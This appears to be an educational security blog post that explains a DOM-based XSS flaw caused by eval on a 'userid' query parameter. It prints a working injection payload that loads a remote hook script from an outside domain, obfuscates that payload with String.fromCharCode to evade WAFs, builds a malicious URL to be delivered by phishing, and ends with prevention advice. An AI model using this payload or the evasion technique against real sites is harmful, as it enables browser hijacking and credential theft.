Since the above javascript uses the unsafe eval function and does not properly sanitize the user input (the Query string parameter 'userid'), an attacker could do the following to exploit this vulnerable code.
First to understand the concept, basically the attacker can control the value of the calllogfunction variable and can inject his own code into it that will execute against the browser and run in the origin/scope of the domain it's on (such as myurl.com). This can be very bad and can lead to malware, keystroke logging, drive-by downloads, credential theft, internal network recon, and much more.
At a super high level, we'd expect the calllogfunction variable to end up containing this
logUserId(12345)
But in my example below, as the attacker I am able to change the value of the calllogfunction variable to something such as below where I completely control 'my evil code'
logUserId(12345);eval('my evil code')
As a more realistic example I'm going to make it look like this.
logUserId(12345);eval(s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s))
If we quickly run through this code, here's what it does
logUserId(12345);
The above line logs the userid as the developer desired.
eval(s=document.createElement('script');
The above line then creates a new script tag which is where the attacker will insert his javascript code.
s.src='http://neonprimetime.blogspot.com/fakehook.js';
The above line then sets the source of the javascript code to his evil website hook script which does the bad things like installing malware, keylogging, or whatever is desired.
document.getElementsByTagName('head')[0].appendChild(s)
The above line finally searches for the head tag in the html page and appends the attackers script tag right after it dynamically. So just like that, which a few strokes of magic javascript code, the attackers evil javascript (hosted at neonprimetime.blogspot.com) is now running inside the user's browser under the origin/scope of the good site myurl.com.
So now to make this attack work, we simply need to adjust our url and get the victim user to click our adjusted url.
The first thing the attacker would do is take the evil code above (s=document.createElement........), drop it into a free utility like this one that converts the evil string code to integer character codes such as these ( 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 110, 101, 111, 110, 112, 114, 105, 109, 101, 116, 105, 109, 101, 46, 98, 108, 111, 103, 115, 112, 111, 116, 46, 99, 111, 109, 47, 102, 97, 107, 101, 104, 111, 111, 107, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59 )
This is done for probably at least 2 reasons, 1 is to avoid issues where a closing tick mark like this ' will terminate the original eval javascript statement. If that tick mark terminates the statement, then our attacker code won't get executed. The 2nd reason is more for obfuscation. This makes it harder for a WAF (web application firewall) or other tools to detect and block evil code since the obfuscated combinations options are literally endless.
We then add a call to the powerful Javascript function String.fromCharCode() which works the magic of converting our integers back into the evil code to execute. Thus we'd end up changing this hxxp://myurl.com/domxsstest.html?userid=123456 to something uglier like this hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))//
Then you throw this link into a phishing email or submit it to a message board or via social media messaging and get somebody to click on it. They're more likely to click on a link like this because even if they hover over the link and manually review it with their eyes prior to clicking, they'll see that the url is coming directly from their trusted url (myurl.com) so they'll be satisfied and click. But once they click, they're hooked, they're infected, and the bad guy has what he wants, control over that browser.
You can test out the code from the pastebin link above locally and watch as we discussed that the console will get logged the userid just as expected
But also in the background (end user would never even know) the javascript hook file was loaded from the 2nd domain.
OWASP, as usual, has a great link describing how to prevent attacks like this. You could also add HTTP Headers like Content-Security-Policy to restrict which domains scripts can evel be loaded from ,thus preventing the evil attackers javascript from even being loaded by the browser even if you are vulnerable to DOM XSS. This blog is a good quick read about those headers.
Hope this helps and remember to never underestimate an XSS vulnerability. If one shows up on your website, get your developers to fix it ASAP.
Credit goes to the Browser Hacker's Handbook for giving me the initial intro.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Labels:
Document Object Model,
DOM,
Reflected XSS,
Stored XSS,
XSS
Subscribe to:
Posts (Atom)